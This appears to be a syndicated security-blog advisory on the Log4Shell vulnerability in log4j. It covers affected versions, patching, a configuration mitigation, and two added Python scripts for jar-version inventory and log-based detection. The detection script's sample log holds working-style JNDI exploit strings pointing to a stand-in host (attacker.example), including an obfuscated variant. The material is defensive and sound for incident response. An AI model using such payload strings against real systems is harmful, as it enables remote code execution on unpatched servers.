
Security Advisory Regarding Log4Shell

Summary

On December 9, a Remote Code Execution (RCE) vulnerability was discovered in the Java logging library log4j and assigned CVE-2021-44228. The RCE is triggered when a Java-based application logs the exploit string: log4j resolves the string, fetches the remote payload it points to, and executes it. This leaves any server hosting an unpatched Java application exposed to exploitation.

Log4j2 released version 2.15.0 on Dec 09, 2021 to fix the vulnerability.

Details

The vulnerability affects Log4j versions 1.0 to 2.14.1. If you run any Java application that uses an affected log4j library and that accepts and logs user input, make a significant effort to apply the patch. For enterprise customers this means Java-based web applications, and possibly network or security appliances that embed Java in their operation. Java's well-known tagline is that it runs on billions of devices. Apache Struts appears to be affected, although some versions of the JDK are not affected because they were already secured.

LunaSec has a more detailed write-up on the vulnerability and exploit.

Please note that log4j 2.12.1 was the last release of log4j that supported Java 7 and that patching this vulnerability may require updating the JVM to Java 8. 

Mitigations

Log4j2 versions 2.10.0 and greater have a formatMsgNoLookups property which will mitigate the vulnerability if enabled. If this setting does not break anything in your application, it is recommended to enable it.
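The version thresholds above (2.10.0 for the formatMsgNoLookups property, 2.15.0 for the fix) can be turned into a quick inventory check. The script below is an added example, not code from the original advisory or from the Log4j project: it walks a directory tree, reads the Implementation-Version attribute from each log4j-core jar's manifest, and reports whether the jar is fixed, vulnerable but mitigable with the property, or vulnerable with no property to switch on. It assumes that log4j-core jars carry Implementation-Version in META-INF/MANIFEST.MF and that the system-property spelling of the mitigation is log4j2.formatMsgNoLookups; the jars it builds for the demo are constructed stand-ins containing only a manifest.

```python
import tempfile
import zipfile
from pathlib import Path
from typing import Dict, Optional, Tuple

# Thresholds are the ones stated in the advisory; 1.x jars fall under "vulnerable"
# here because they have no formatMsgNoLookups property to switch on.
FIXED_FROM = (2, 15, 0)       # 2.15.0 fixes the bug
NOLOOKUPS_FROM = (2, 10, 0)   # formatMsgNoLookups exists from 2.10.0

# The interim mitigation the advisory describes, expressed as a JVM flag
# (assumption: the system-property spelling log4j2.formatMsgNoLookups).
MITIGATION_FLAG = "-Dlog4j2.formatMsgNoLookups=true"


def parse_version(text: str) -> Tuple[int, ...]:
    """'2.14.1' -> (2, 14, 1); a suffix such as '-rc1' is ignored."""
    core = text.strip().split("-")[0]
    return tuple(int(part) for part in core.split("."))


def classify(version: str) -> str:
    v = parse_version(version)
    if v >= FIXED_FROM:
        return "fixed"
    if v >= NOLOOKUPS_FROM:
        return "vulnerable-mitigable"   # set MITIGATION_FLAG until the upgrade lands
    return "vulnerable"                 # no property available: upgrading is the only fix


def manifest_version(jar_path: Path) -> Optional[str]:
    """Implementation-Version from META-INF/MANIFEST.MF (assumption: log4j-core jars set it)."""
    with zipfile.ZipFile(jar_path) as zf:
        if "META-INF/MANIFEST.MF" not in zf.namelist():
            return None
        manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    for raw in manifest.splitlines():
        if raw.lower().startswith("implementation-version:"):
            return raw.split(":", 1)[1].strip()
    return None


def scan_tree(root: Path) -> Dict[str, str]:
    """Map every log4j-core*.jar under root to its status."""
    results = {}
    for jar in sorted(root.rglob("log4j-core*.jar")):
        version = manifest_version(jar)
        results[jar.name] = "unknown" if version is None else classify(version)
    return results


def make_sample_jar(path: Path, version: str) -> Path:
    """Constructed stand-in for a log4j-core jar: a manifest and nothing else."""
    path.parent.mkdir(parents=True, exist_ok=True)
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF",
                    f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
    return path


def demo() -> Dict[str, str]:
    """Triage a throwaway tree of constructed jars (sample data, not a real deployment)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        make_sample_jar(root / "app" / "lib" / "log4j-core-2.14.1.jar", "2.14.1")
        make_sample_jar(root / "app" / "lib" / "log4j-core-2.9.1.jar", "2.9.1")
        make_sample_jar(root / "other" / "WEB-INF" / "lib" / "log4j-core-2.15.0.jar", "2.15.0")
        return scan_tree(root)


if __name__ == "__main__":
    for name, status in demo().items():
        hint = f" (interim: add {MITIGATION_FLAG})" if status == "vulnerable-mitigable" else ""
        print(f"{name}: {status}{hint}")
```

Point scan_tree at an application root to get a per-jar status; it does not look inside WAR or EAR archives, so unpack those first, and a "vulnerable-mitigable" result still means the upgrade is the real fix, as the advisory says.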

Detection

To detect exploit attempts, search web logs for the string “${jndi:”. Any hit should be followed by a payload location; if outbound traffic to that location was allowed, fully investigate the server to determine what was executed.
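The log search described above, as an added example that is not part of the original advisory: it runs over a few constructed access-log lines, finds every “${jndi:” lookup, and returns the payload location that follows it so an analyst can check egress logs for a connection to that host. It goes one step beyond the literal string match in the text by first collapsing the single-character ${lower:…}, ${upper:…} and ${::-…} wrappers that scanners wrap around the marker, and by matching the marker case-insensitively. The sample lines, IP addresses and the attacker.example host are all constructed for this example.

```python
import re
from typing import List, Tuple

# Constructed sample access-log lines for this example; not taken from the advisory.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Dec/2021:03:15:21 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://attacker.example/a}"
10.0.0.9 - - [10/Dec/2021:03:15:22 +0000] "GET /?q=${${lower:j}ndi:ldap://attacker.example/b} HTTP/1.1" 404 0 "-" "curl/7.79"
10.0.0.3 - - [10/Dec/2021:03:16:00 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

MARKER = "${jndi:"

# Single-level wrappers that break up the literal marker:
# ${lower:J} -> j, ${upper:j} -> J, ${::-j} -> j (default-value form with an empty lookup).
_WRAPPER = re.compile(r"\$\{lower:([^{}]*)\}|\$\{upper:([^{}]*)\}|\$\{::-([^{}]*)\}")


def _unwrap(m) -> str:
    if m.group(1) is not None:
        return m.group(1).lower()
    if m.group(2) is not None:
        return m.group(2).upper()
    return m.group(3)


def normalize(line: str) -> str:
    """Collapse nested wrappers until nothing changes, so ${${lower:j}ndi:...} reads ${jndi:...}."""
    prev = None
    while prev != line:
        prev = line
        line = _WRAPPER.sub(_unwrap, line)
    return line


def extract_payloads(line: str) -> List[str]:
    """Return each JNDI lookup target in the line, e.g. 'ldap://attacker.example/a'.
    The marker match is case-insensitive; the returned target keeps its original casing."""
    norm = normalize(line)
    low = norm.lower()
    targets = []
    start = low.find(MARKER)
    while start != -1:
        i = start + len(MARKER)
        depth = 1
        while i < len(norm):
            if norm.startswith("${", i):      # nested lookup inside the target
                depth += 1
                i += 2
                continue
            if norm[i] == "}":
                depth -= 1
                if depth == 0:
                    break
            i += 1
        targets.append(norm[start + len(MARKER):i])
        start = low.find(MARKER, i)
    return targets


def scan(log_text: str) -> List[Tuple[int, str]]:
    """(line number, target) for every hit: the list an analyst pivots on."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        for target in extract_payloads(line):
            hits.append((n, target))
    return hits


if __name__ == "__main__":
    for n, target in scan(SAMPLE_LOG):
        print(f"line {n}: JNDI lookup to {target} - check egress logs for a connection to it")
```

Feed scan() the contents of an access log (user-agent and request-line fields are where the string usually lands) and treat every returned target as a host to look for in proxy and firewall logs; a successful outbound connection to it is the signal that the server needs the full investigation the advisory calls for.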

GreyNoise has added tags to its service that identify web scanners probing for the vulnerability:

Web Scanners scanning with the user agent “jndi:ldap”

Web Scanners tagged with log4j

Additional Resources

Proof of concept exploits for this vulnerability as well as detailed write-ups are currently available below:

The post Security Advisory Regarding Log4Shell appeared first on Hurricane Labs.

*** This is a Security Bloggers Network syndicated blog from Hurricane Labs authored by Dusty Miller. Read the original post at: https://hurricanelabs.com/security-advisory/security-advisory-regarding-log4shell/?utm_source=rss&utm_medium=rss&utm_campaign=security-advisory-regarding-log4shell
